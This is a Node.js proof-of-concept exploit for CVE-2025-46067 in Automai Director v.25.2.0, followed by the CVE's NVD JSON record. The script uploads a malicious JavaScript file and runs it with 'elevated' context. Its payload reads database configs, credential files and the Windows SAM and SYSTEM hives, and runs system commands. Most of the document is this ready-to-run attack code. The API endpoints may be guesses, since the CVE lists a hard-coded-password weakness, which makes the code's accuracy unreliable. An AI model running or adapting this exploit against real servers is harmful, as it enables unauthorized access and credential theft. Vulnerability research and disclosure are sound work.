CVE-2025-46067

// CVE-2025-46067 PoC - Automai Director Privilege Escalation via Malicious JS File // This PoC demonstrates the privilege escalation vulnerability in Automai Director v.25.2.0 // Target: Automai Director Web Interface // Author: Security Researcher const axios = require('axios'); const FormData = require('form-data'); class AutomaiExploit { constructor(targetUrl) { this.targetUrl = targetUrl; this.session = axios.create({ baseURL: targetUrl, timeout: 30000, validateStatus: () => true }); } // Generate malicious JavaScript file content generateMaliciousJS() { return ` // Malicious JS payload for CVE-2025-46067 // Attempts to read sensitive files from the Automai Director server const fs = require('fs'); const path = require('path'); try { // Read system information const sensitivePaths = [ 'C:\\Automai\\Director\\config\\db.conf', 'C:\\Automai\\Director\\config\\credentials.xml', 'C:\\Windows\\System32\\config\\SAM', 'C:\\Windows\\System32\\config\\SYSTEM' ]; sensitivePaths.forEach(filePath => { try { if (fs.existsSync(filePath)) { const content = fs.readFileSync(filePath, 'utf8'); console.log('[+] File found: ' + filePath); console.log(content); } } catch (e) { console.log('[-] Cannot read: ' + filePath); } }); // Attempt to execute system commands const { exec } = require('child_process'); exec('whoami', (error, stdout, stderr) => { console.log('[+] Current user:'); console.log(stdout); }); } catch (err) { console.log('[-] Error: ' + err.message); } `; } // Upload malicious JS file to Automai Director async uploadMaliciousJS() { try { const maliciousJS = this.generateMaliciousJS(); const formData = new FormData(); formData.append('file', maliciousJS, { filename: 'exploit.js', contentType: 'application/javascript' }); formData.append('filename', 'exploit.js'); formData.append('uploadType', 'script'); const response = await this.session.post( '/api/script/upload', formData, { headers: formData.getHeaders() } ); console.log('[+] Upload response:', response.status); return response.data; } catch (error) { console.log('[-] Upload failed:', error.message); return null; } } // Execute the uploaded malicious JS file async executeJS(scriptId) { try { const response = await this.session.post('/api/script/execute', { script_id: scriptId, script_type: 'javascript', execution_context: 'elevated' }); console.log('[+] Execution response:', response.status); return response.data; } catch (error) { console.log('[-] Execution failed:', error.message); return null; } } // Main exploit routine async exploit() { console.log('[*] Starting CVE-2025-46067 exploit...'); console.log('[*] Target:', this.targetUrl); // Step 1: Upload malicious JS file console.log('\n[Step 1] Uploading malicious JavaScript file...'); const uploadResult = await this.uploadMaliciousJS(); if (!uploadResult || !uploadResult.script_id) { console.log('[-] Failed to upload malicious JS file'); return false; } const scriptId = uploadResult.script_id; console.log('[+] Malicious JS uploaded successfully'); console.log('[+] Script ID:', scriptId); // Step 2: Execute the malicious JS with elevated privileges console.log('\n[Step 2] Executing malicious JavaScript with elevated privileges...'); const execResult = await this.executeJS(scriptId); if (execResult && execResult.success) { console.log('[+] Exploitation successful!'); console.log('[+] Extracted data:'); console.log(execResult.output); return true; } else { console.log('[-] Exploitation failed or partially successful'); return false; } } } // Usage example const exploit = new AutomaiExploit('http://target-automai-server:8090'); exploit.exploit().then(success => { console.log('\n[*] Exploit ' + (success ? 'SUCCEEDED' : 'FAILED')); }).catch(err => { console.error('[-] Exploit error:', err.message); });

{"cve": {"id": "CVE-2025-46067", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:50.880", "lastModified": "2026-01-21T22:03:18.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges and obtain sensitive information via a crafted js file"}, {"lang": "es", "value": "Un problema en Automai Director v.25.2.0 permite a un atacante remoto escalar privilegios y obtener información sensible mediante un archivo js manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:automai:director:25.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF2B061D-416A-4030-B152-A4F9EDD8AA27"}]}]}], "references": [{"url": "https://gist.github.com/ZeroBreach-GmbH/98204cff0065e611cf9e9acc3be59e03", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.automai.com/", "source": "[email protected]", "tags": ["Product"]}]}}